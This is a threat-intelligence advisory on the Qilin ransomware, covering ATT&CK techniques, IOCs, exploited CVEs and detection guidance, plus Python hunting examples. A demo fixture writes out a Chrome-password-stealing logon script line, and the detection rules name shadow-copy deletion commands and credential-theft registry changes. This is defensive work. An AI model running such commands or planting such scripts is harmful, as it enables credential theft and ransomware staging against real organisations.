Severity: Critical | Ransomware-as-a-Service | Status: Active | Origin: 🇷🇺 Russia (suspected) | TLP:CLEAR

Qilin Ransomware

Ransomware-as-a-Service with Chrome Credential Harvesting & BYOVD Capabilities

Also known as: Agenda

Qilin has emerged as the #1 ransomware threat to US State, Local, Tribal, and Territorial (SLTT) organizations in Q2 2025, responsible for 24% of reported incidents. With 792+ confirmed attacks, Qilin employs unique GPO-based Chrome credential harvesting and BYOVD EDR evasion.

792+ confirmed victims
24% of SLTT incidents (Q2 2025)
18+ days average dwell time
70+ victims in a single month

Executive Summary

CRITICAL THREAT LEVEL

Qilin employs a unique GPO-based Chrome credential harvesting technique that steals browser passwords across entire domains. This means a Qilin breach requires not only AD password resets but also credential changes for all third-party sites saved in Chrome browsers enterprise-wide.

Qilin (originally "Agenda") is a Ransomware-as-a-Service (RaaS) operation first observed in July 2022. Initially written in Golang, the ransomware was rewritten in Rust by late 2023, gaining cross-platform capabilities including VMware ESXi targeting. The operation runs a double-extortion model with a dedicated leak site.

Qilin affiliates typically gain initial access via compromised VPN credentials (often lacking MFA), exploitation of Veeam Backup (CVE-2023-27532), or phishing campaigns targeting MSP environments. The group absorbed many affiliates from the defunct RansomHub operation in April 2025.

Key Characteristics

  • RaaS model (affiliate-driven)
  • Rust-based (cross-platform)
  • VMware ESXi targeting
  • Chrome credential harvesting via GPO
  • BYOVD for EDR evasion (dark.sys)
  • Veeam backup targeting
  • Double extortion
  • 18+ day average dwell time
  • Russian-speaking operators
  • 792+ confirmed victims

MITRE ATT&CK Mapping

Qilin affiliates employ a comprehensive range of techniques across the attack lifecycle:

  • T1078 Valid Accounts: Compromised VPN credentials, often from dark web leaks
  • T1190 Exploit Public-Facing Application: Veeam CVE-2023-27532, FortiGate CVEs
  • T1484.001 Domain Policy Modification: GPO-based Chrome stealer and ransomware deployment
  • T1555.003 Credentials from Web Browsers: Chrome password extraction via PowerShell
  • T1003.001 LSASS Memory: Mimikatz (Themida-packed) credential dumping
  • T1562.001 Disable Security Tools: EDR termination via kernel driver (BYOVD)
  • T1537 Transfer to Cloud Account: Cyberduck exfiltration to Backblaze
  • T1486 Data Encrypted for Impact: AES-256 + RSA-2048 encryption

Unique Attack: Chrome Credential Harvesting via GPO

After compromising a domain controller, Qilin modifies the default domain GPO to add a logon script that extracts Chrome passwords. The script creates SQLite database files and logs in SYSVOL, named after each machine's hostname. This GPO typically remains active for 3+ days, silently harvesting credentials each time users log in. If detected, all users must change passwords for every site saved in Chrome browsers, in addition to AD password resets.
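
As an added example (not code from this advisory), a small Python hunt that walks an offline copy of SYSVOL for the two artifacts described above: logon scripts that reference Chrome's password store, and .db/.log files named after hostnames. The directory layout, script contents and the hostname WS-FIN-07 are constructed for the demo.

```python
import os
import re
import tempfile
from typing import Dict, List

# Strings a Chrome password-stealing logon script is likely to reference.
CHROME_MARKERS = ("login data", "sqlite", "dpapi", "user data\\default")
SCRIPT_EXTS = {".bat", ".cmd", ".ps1", ".vbs"}
# A NetBIOS hostname (1-15 chars) followed by .db or .log, e.g. WS-FIN-07.db
HOST_ARTIFACT_RE = re.compile(r"^[A-Za-z0-9-]{1,15}\.(db|log)$", re.IGNORECASE)

def hunt_sysvol(sysvol_root: str) -> Dict[str, List[str]]:
    """Walk a SYSVOL tree and flag Chrome-stealer scripts and per-host .db/.log drops."""
    findings: Dict[str, List[str]] = {"suspicious_scripts": [], "host_named_artifacts": []}
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in SCRIPT_EXTS:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    body = fh.read().lower()
                if any(marker in body for marker in CHROME_MARKERS):
                    findings["suspicious_scripts"].append(path)
            elif HOST_ARTIFACT_RE.match(name):
                findings["host_named_artifacts"].append(path)
    return findings

def build_demo_sysvol() -> str:
    """Constructed SYSVOL tree: one benign drive-mapping script, one Chrome-stealer
    logon script (logon.bat, as named in the IOC table) and one hostname-named .db drop."""
    root = tempfile.mkdtemp(prefix="sysvol_demo_")
    scripts = os.path.join(root, "contoso.local", "scripts")
    os.makedirs(scripts)
    with open(os.path.join(scripts, "mapdrives.bat"), "w") as fh:
        fh.write("net use H: \\\\fs01\\home\n")
    with open(os.path.join(scripts, "logon.bat"), "w") as fh:
        fh.write('powershell -w hidden -c "Copy-Item '
                 "'$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data' "
                 "\\\\dc01\\SYSVOL\\contoso.local\\scripts\\$env:COMPUTERNAME.db\"\n")
    with open(os.path.join(scripts, "WS-FIN-07.db"), "wb") as fh:
        fh.write(b"SQLite format 3\x00")  # SQLite header, as Chrome's Login Data carries
    return root

if __name__ == "__main__":
    print(hunt_sysvol(build_demo_sysvol()))
```

Point `hunt_sysvol` at a mounted or copied `\\<dc>\SYSVOL` tree; the marker list is deliberately broad, so review each flagged script rather than treating a hit as confirmation.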


Hunt Modules

The full threat hunting guide includes 10 detailed hunt modules with KQL, Splunk, and Sigma queries. Key modules include:

Module 1: Initial Access - VPN & Phishing Detection (30 min, Critical)

Identify unauthorized VPN access and MSP-targeted phishing campaigns. Check for VPN logins without MFA challenge, logins during unusual hours, and access from hosting provider IPs.

Module 2: Veeam & Backup Infrastructure Targeting (30 min, Critical)

Detect exploitation of Veeam backup infrastructure for credential theft (CVE-2023-27532) and backup destruction. Any unauthorized access to Veeam databases or deletion of backup jobs indicates imminent ransomware deployment.

Module 3: Chrome Credential Harvesting via GPO (45 min, Critical)

Detect Qilin's signature GPO-based Chrome password stealing technique. Look for GPO logon script modifications, Chrome credential access patterns, and suspicious .db/.log files in SYSVOL.

Module 5: BYOVD EDR Evasion (dark.sys) (30 min, Critical)

Detect Bring Your Own Vulnerable Driver attacks used to disable EDR. Monitor for dark.sys, eskle.sys, and other vulnerable driver loading. BYOVD activity indicates imminent ransomware deployment.

Module 9: Pre-Encryption Indicators (30 min, Critical)

Detect final-stage preparation before ransomware execution: critical service termination (SQL, Exchange, Veeam, VMware), shadow copy deletion, event log clearing, and w.exe deployment to C:\temp.

Download Full Threat Hunting Guide

Complete 10-module hunting guide with KQL, Splunk, and Sigma detection rules.

Download PDF — Free

Indicators of Compromise

File Indicators

Name | Type | Context
w.exe | Ransomware | Primary payload (C:\temp\)
encryptor_1.exe / encryptor_2.exe | Ransomware | Dual encryptor deployment
dark.sys | Driver | BYOVD EDR killer
HRSword.exe | Tool | Defense evasion
pars.vbs | Script | SMTP exfiltration (Cyrillic encoding)
logon.bat | Script | GPO Chrome harvester launcher

Exploited Vulnerabilities

CVE | Product | Usage
CVE-2023-27532 | Veeam Backup & Replication | Credential extraction
CVE-2024-21762 | Fortinet FortiOS | Initial access (SSL VPN)
CVE-2024-55591 | Fortinet FortiOS | Initial access (SSL VPN)

Registry Modifications

Key | Value | Purpose
HKLM\...\WDigest\UseLogonCredential | 1 | Enable WDigest caching
HKLM\...\Terminal Server\fDenyTSConnections | 0 | Enable RDP
HKLM\...\Lsa\DisableRestrictedAdmin | 0 | Enable pass-the-hash

Detection & Response

Key Detection Opportunities

GPO-Based Attacks

  • GPO logon script modifications (SYSVOL)
  • Chrome credential database access by non-Chrome processes
  • Suspicious .db/.log files in SYSVOL
  • PowerShell with SQLite/Chrome references

BYOVD Activity

  • dark.sys or eskle.sys driver loading
  • Unsigned driver installation
  • EDR process termination attempts
  • 2stX.exe, Or2.exe, HRSword.exe execution

Backup Targeting

  • Veeam credential database access
  • Backup job deletion/modification
  • PowerShell Veeam cmdlet abuse
  • TCP 9401 anomalous connections

Pre-Encryption

  • Shadow copy deletion (vssadmin, wmic)
  • Critical service termination
  • w.exe in C:\temp directory
  • Scheduled task creation for run.bat
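
An added example, not part of the advisory, that turns the detection opportunities above into checks over Sysmon-style events (Event ID 13 registry value set, 6 driver loaded, 1 process created): the registry values from the table, dark.sys/eskle.sys driver loads, the EDR-killer tools, shadow copy deletion and w.exe in C:\temp. The event records are constructed; the field names follow Sysmon's.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Registry values from the advisory's table and the value that signals abuse.
REGISTRY_RULES = {
    "wdigest\\uselogoncredential": ("1", "WDigest cleartext caching enabled"),
    "terminal server\\fdenytsconnections": ("0", "RDP enabled via registry"),
    "lsa\\disablerestrictedadmin": ("0", "Restricted Admin disabled (pass-the-hash)"),
}
BYOVD_DRIVERS = {"dark.sys", "eskle.sys"}
EDR_KILLER_TOOLS = {"2stx.exe", "or2.exe", "hrsword.exe"}
SHADOW_DELETE_RE = re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.I)

def dword_value(details: str) -> str:
    """Sysmon renders DWORDs as 'DWORD (0x00000001)'; return the value in decimal."""
    m = re.search(r"0x([0-9a-f]+)", details, re.I)
    return str(int(m.group(1), 16)) if m else details

def match_event(ev: Dict[str, str]) -> List[str]:
    """Return the label of every detection opportunity the event satisfies."""
    hits: List[str] = []
    eid, image, cmd = ev.get("EventID"), ev.get("Image", ""), ev.get("CommandLine", "")
    if eid == "13":  # registry value set
        target = ev.get("TargetObject", "").lower()
        for suffix, (bad_value, label) in REGISTRY_RULES.items():
            if target.endswith(suffix) and dword_value(ev.get("Details", "")) == bad_value:
                hits.append(label)
    elif eid == "6" and ntpath.basename(ev.get("ImageLoaded", "")).lower() in BYOVD_DRIVERS:
        hits.append("BYOVD vulnerable driver loaded")  # driver load
    elif eid == "1":  # process created
        if ntpath.basename(image).lower() in EDR_KILLER_TOOLS:
            hits.append("EDR killer tool executed")
        if image.lower() == r"c:\temp\w.exe":
            hits.append("Ransomware payload staged in C:\\temp")
        if SHADOW_DELETE_RE.search(cmd):
            hits.append("Shadow copy deletion")
    return hits

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    return [(i, h) for i, ev in enumerate(events) for h in match_event(ev)]

# Constructed sample events (not from a real incident); the last one is benign.
SAMPLE_EVENTS = [
    {"EventID": "13", "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential", "Details": "DWORD (0x00000001)"},
    {"EventID": "6", "ImageLoaded": r"C:\Windows\Temp\dark.sys"},
    {"EventID": "1", "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"EventID": "1", "Image": r"C:\temp\w.exe", "CommandLine": "w.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
```

Several of these hits within minutes of each other on one host (driver load, then shadow copy deletion, then w.exe) is the pre-encryption sequence the advisory describes and warrants isolating the host.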

Available Detection Rules

The full PDF includes custom Sigma detection rules for:

  • Qilin Chrome Credential Harvesting via GPO - Detects Chrome credential access from GPO logon scripts
  • Qilin BYOVD EDR Killer - Detects loading of vulnerable drivers used for EDR evasion
  • WDigest UseLogonCredential Modification - Detects enabling of WDigest credential caching

Track Qilin with BRACE

BRACE delivers monthly sector-specific threat intelligence covering Qilin and ransomware activity, including:

  • Qilin campaign analysis and victim tracking
  • Detection rules for credential harvesting and BYOVD
  • MITRE ATT&CK mappings for ransomware TTPs
  • Sector-specific threat hunting playbooks
  • IOCs and behavioral indicators


Stay Ahead of Qilin

BRACE delivers monthly threat intelligence on Qilin and 175+ other threat groups with detection rules and hunting playbooks for your sector.